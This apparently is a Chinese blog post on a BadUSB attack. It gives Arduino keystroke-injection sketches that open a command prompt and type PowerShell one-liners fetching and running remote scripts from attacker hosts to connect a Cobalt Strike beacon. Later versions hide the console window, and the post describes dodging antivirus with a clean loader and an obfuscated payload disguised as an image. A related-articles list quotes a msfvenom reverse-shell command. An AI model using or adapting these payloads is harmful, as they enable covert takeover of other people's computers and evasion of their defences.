首页 > 其他分享 >近源渗透之badusb上线CS(免杀)

近源渗透之badusb上线CS(免杀)

时间:2023-08-12 23:33:05浏览次数:40  
标签:近源 免杀 badusb LOCK CAPS delay KEY Keyboard press

0x00 实验环境

攻击设备:badusb

靶场:windows笔记本

 

0x01 实验前提

(1)购买badusb,购买链接:

【淘宝】https://m.tb.cn/h.5XSFFqJ?tk=ybTGdE7tM03 CZ3457 「(374)32U4 虚拟键盘 Badusb Leonardo USB ATMEGA32U4开发板单片」
点击链接直接打开 或者 淘宝搜索直接打开

(2)安装Arduino IDE,一款专业的arduino开发工具,主要用于arduino程序的编写和开发,拥有开放源代码的电路图设计等,建议安装低版本,高版本在编写代码时需要加上:

#include "Keyboard.h"

 

 

0x02 实验步骤

(1)CS生成powershell一句话上线的命令:

 

 (2)注意,这里分为两步,验证与上传,验证是不需要插入badusb的,仅仅是进行编译的动作,但是上传是需要插入badusb的,还有一个需要注意,在上传代码至badusb时

需要提前选择你的usb串口:出现以下标识即为连接上了:

 

(3)这里有好几种模式的板开发,数字板与直接的板类型,有的是DigiKeyboard,有的是Keyboard,要针对不同的类型去选择,如果是Keyboard的话直接选择这两个即可,如下图,有的公众号会出现数字板:

 我们直接选择Leonordo烧录即可。

 (4)首先复制如下代码进行验证(Verify),ino内写入以下代码:因为我的IDE版本比较低,所以就不需要写 #include "Keyboard.h"

void setup() {
  Keyboard.begin();
  delay(3000);//延时
  Keyboard.press(KEY_LEFT_GUI);
  delay(200); 
  Keyboard.print("r");
  delay(200); 
  Keyboard.release(KEY_LEFT_GUI);
  Keyboard.press(KEY_CAPS_LOCK);
  Keyboard.release(KEY_CAPS_LOCK);
  delay(200); 
  //=========================Run==========================
  Keyboard.println("cmd");
  delay(500);
  Keyboard.println("powershell.exe -nop -w hidden -c 'IEX ((new-object net.webclient).downloadstring('http://192.168.31.242:9999/a'))'");
  //======================================================
  Keyboard.press(KEY_CAPS_LOCK);
  Keyboard.release(KEY_CAPS_LOCK);
  Keyboard.end();//结束键盘通讯 
}

void loop() {
}

 

 

 (5)上传至badusb:

 

 (6)然后会运行一次作为示例,再次返回CS,发现已成功上线(需要等差不多30秒):

 

 (7)但是上面那个方法并不好,无法持续控制,可以修改为以下代码,程序就能一直运行:

 

void setup() {
  Keyboard.begin();
  delay(3000);//延时
  Keyboard.press(KEY_LEFT_GUI);
  delay(200); 
  Keyboard.print("r");
  delay(200); 
  Keyboard.release(KEY_LEFT_GUI);
  Keyboard.press(KEY_CAPS_LOCK);
  Keyboard.release(KEY_CAPS_LOCK);
  delay(200); 
  //=========================Run==========================
  Keyboard.println("cmd");
  delay(500);
  Keyboard.println("echo set-alias -name rookie -value Invoke-Expression;rookie(new-object net.webclient).downloadstring('http://192.168.31.61:9713/1.ps1') | powershell -");
  delay(5000);
  //======================================================
  Keyboard.press(KEY_CAPS_LOCK);
  Keyboard.release(KEY_CAPS_LOCK);
  Keyboard.end();//结束键盘通讯 
}

void loop() {
}

(8)但是这个又太明显了,我们需要隐藏一下我们的dos窗口:可以使用以下命令隐藏我们的dos窗口:

void setup() {
  Keyboard.begin();
  delay(3000);//延时
  Keyboard.press(KEY_LEFT_GUI);
  delay(200); 
  Keyboard.print("r");
  delay(200); 
  Keyboard.release(KEY_LEFT_GUI);
  Keyboard.press(KEY_CAPS_LOCK);
  Keyboard.release(KEY_CAPS_LOCK);
  Keyboard.println("CMD /t:01 /k @ECHO OFF && MODE CON:cols=15 lines=1");   //使用最小化隐藏cmd窗口
  delay(200); 
  //=========================Run==========================
  Keyboard.println("cmd");
  delay(500);
  Keyboard.println("echo set-alias -name rookie -value Invoke-Expression;rookie(new-object net.webclient).downloadstring('http://192.168.31.61:9713/1.ps1') | powershell -");
  delay(5000);
  //======================================================
  Keyboard.press(KEY_CAPS_LOCK);
  Keyboard.release(KEY_CAPS_LOCK);
  Keyboard.end();//结束键盘通讯 
}

void loop() {
}

 

 

(9)还有一个问题是一般杀软都会拦截我们的powershell执行的,隐藏我们不能直接使用这种方式上线CS,而是需要使用一个免杀马运行后上线CS,这里可以首先下载一个白的加载器,然后再下载被我们混淆过的bin文件,以图片的方式去执行,先测试一下下载白的加载器,看看会不会被杀:

 

 (10)可以看到火绒之类的是不会被杀的,然后我们在下载图片马,生成恶意的bin文件,然后使用工具对其进行编码等操作,这个可以私聊我。

 

将payload编译成s.jpg上线CS:

 (11)此时我们不仅能保证免杀,窗口隐藏不被发现,还能不使用powershell的方式(powershell容易被杀软拦截)成功上线CS:

0x03 免责说明

本文章仅用于学习、工作与兴趣爱好,并立志为网络安全奉献一份力量,凡是利用本博客相关内容的无良hackers造成的安全事故均与本人无关!

标签:近源,免杀,badusb,LOCK,CAPS,delay,KEY,Keyboard,press
From: https://www.cnblogs.com/cute-puli/p/17625768.html

相关文章

  • 免杀工具 -- SysWhispers3WinHttp
    0x01工具介绍SysWhispers3WinHttp基于SysWhispers3增添WinHttp分离加载,可免杀360核晶与Defender等杀软。0x02安装与使用1.使用msfvenom生成Shellcode(或使用CobaltStrike生成Stageless之Shellcode)msfvenom-pwindows/x64/meterpreter_reverse_tcplhost=192.168.1.110lport=44......
  • 实现免杀:Shellcode的AES和XOR加密策略(vt查杀率:4/70)
    前言什么是私钥和公钥私钥和公钥是密码学中用于实现加密、解密和数字签名等功能的关键组件。私钥是一种加密算法中的秘密密钥,只有密钥的拥有者可以访问和使用它。私钥通常用于数字签名和数据加密等场景中,它可以用于对数据进行加密,同时也可以用于解密已经被加密的数据。公钥是......
  • Shellcode分离加载实现免杀的两种方式(VT免杀率:1/68)
    简介本文详细介绍了如何通过文件加载和远程URL加载方式实现Shellcode分离加载,以规避安全软件的检测。文章首先描述了通过MetasploitFramework生成的shellcode文件加载的过程,并提供了相关的C++代码。为了避免被杀毒软件检测,利用动态API调用和lazy_importer项目进行代码优化。其......
  • 近源渗透学习
    一、近源渗透近源渗透测试是网络空间安全领域逐渐兴起的一种新的安全评估手段。它是一种集常规网络攻防、物理接近、社会工程学及无线电通信攻防等能力于一体的高规格网络安全评估行动。网络安全评估小组在签订渗透测试授权协议后,通过乔装、社工等方式实地物理侵入企业办公区域,......
  • 免杀
    免杀基础1.初步木马免杀可能要更改进程名称,图标,文件名称,文件属性,加壳,生成木马时使用编码修改源码的特征码;对shellcode二次编译;免杀生成器;加载器和shellcode分离,msfvenom免杀常用命令:x86orx64-a:指定位数x-p:指定payload模块-l:列出可用项-f:指定文件类型......
  • 免杀|PEiD查壳、脱壳+汉化+工具打包
    一、加壳加壳的全称应该是可执行程序资源压缩,压缩后的程序可以直接运行。加壳的另一种常用的方式是在二进制的程序中植入一段代码,在运行的时候优先取得程序的控制权,之后再把控制权交还给原始代码,这样做的目的是隐藏程序真正的OEP(入口点,防止被破解,查壳就是为了找它),类似于动物界的......
  • 免杀原理
    一、实验内容1.正确使用msf编码器,veil-evasion,自己利用shellcode编程等免杀工具或技巧正确使用msf编码器,使用msfvenom生成如jar之类的其他文件veil,加壳工具使用C+shellcode编程2.通过组合应用各种技术实现恶意代码免杀如果成功实现了免杀的,简单语言描述原理,不要截图。与......
  • Exp3-免杀原理 20202211王宏韬
    目录1.基础问题回答(1)杀软是如何检测出恶意代码的?(2)免杀是做什么?(3)免杀的基本方法有哪些?(4)开启杀软能绝对防止电脑中恶意代码吗?2.实践总结与体会3.实践过程记录3.1环境准备3.1.1安装wine323.1.2安装工具veil3.2正确使用msf编码器,使用msfvenom生成如jar之类的......
  • Exp3:免杀原理
    目录一.实验信息二.实验内容2.1实验内容2.1.1方法(分)2.1.2通过组合应用各种技术实现恶意代码免杀(1分)2.1.3附加题:用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本(加分1)2.2报告要求三.实验知识3.1免杀3.2veilevasion3.3实验检测平台四.实验过......
  • Exp3-免杀原理
    Exp3-免杀原理目录1、基础问题回答1.1杀软检测出恶意代码的原理1.1.1基于特征码1.1.2利用启发式恶意软件1.1.3基于行为1.2什么是免杀1.3免杀的基本方法1.3.1改变特征码1.3.2改变行为1.4杀软不能绝对保证电脑安全二、实验内容......